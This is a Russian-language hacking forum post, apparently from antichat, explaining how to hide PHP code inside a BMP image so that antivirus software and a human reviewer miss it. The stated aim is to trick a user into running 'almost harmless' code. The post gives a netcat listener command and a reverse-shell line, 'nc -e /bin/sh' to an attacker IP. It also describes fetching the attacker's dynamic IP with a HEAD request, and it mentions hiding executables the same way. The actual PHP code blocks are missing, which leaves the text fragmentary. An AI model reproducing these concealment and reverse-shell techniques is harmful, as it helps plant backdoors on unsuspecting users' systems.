![]() |
php - скрываем начинку
Статья по большей части западло, т.к. приватных секретов не рассказываю, а рассказываю только клевые фичи :))) для затравки советую прочитать 2 статьи (если еще не прочитали): http://forum.antichat.ru/thread23432...%EE%FF%ED.html и http://forum.antichat.ru/thread20386-netcat.html Прочитали? ну тогда дальше: почему меня она не устроила? слишком мало раскрывают вкусностей :( - причем не раскрывают очевидных :) а именно - маскировка пшп кода. О примитивных методах я уже писал - http://forum.antichat.ru/thread27118.html - но это не совсем то, о каком методе расскажу сейчас. чем плох тот? ну... э... тем, что антивирь все равно найдет такой код, покрайней мере его подкрасит, а человек, просматривая сорец найдет его 99%, а наша цель спрятать от человека, т.к. мы впариваем "почти" безобидный код! типа - нака, зацени мое творение! :D Наша задача засунуть пшп код куданибудь подальше, так, чтобы юзер ничего даже не заподозрил! Где будем ныкать? ну например в картинке :) тут вы можете возразить, мол типа - неоткрываемая пикча подозрительно! ан нет) смотря как редактировать. Вот например - зацените пикчу: http://img66.imageshack.us/img66/346/testet5.png http://slil.ru/24095350 - "боевой" файл в формате бмп (имаджшак ужимает в .png) в чем накол? на глаз незаметно, а загляните-ка в хекс-редакторе и проматайте в самый низ, удивило, правда? http://img67.imageshack.us/img67/6363/dumpdn0.th.jpg в самом начале можно заметить еще и встроеный алерт) зачем он, поймете дальше. итак, врятли антивирь да и пользователь, точнее наивероятно не будут так палить пикчи а это нам на руку ))) PHP код:
нет... это не то, что нам нужно. думаете забить? нет, не забьем, вспоминаем про функции "кеширования" вывода: PHP код:
Но! это еще не все) с тем же успехом мы можем сныкать экзешник :) |
Пряники)
Вкусности, для начала солененькие :)
PHP код:
локально: nc -l -n -v -p 80 в код: nc -e /bin/sh 10.31.3.37 80 тоже солено, скажете вы? ну чтож, а если айпишка кулхацкера динамическая? подсластим раствор: с помощью сокетов или fopen открываем файл на удаленном сайте с нашим айпи, к которому будем коннектиться. думаете юзать GET, так? а нафиг читали вот это: http://forum.antichat.ru/thread35180.html ??? конечно же юзаем метод HEAD ) итак, код серверного сценария: PHP код:
PHP код:
Цитата:
насчет элементарности - согласен, только 1 вещь - это модель, лучше конечно юзать отксоренный участок кода пикчи (конечно, с оговорками - мы не должны получить "лишнего кода") :) но, как говорится, все гениальное просто :) |
| Время: 00:06 |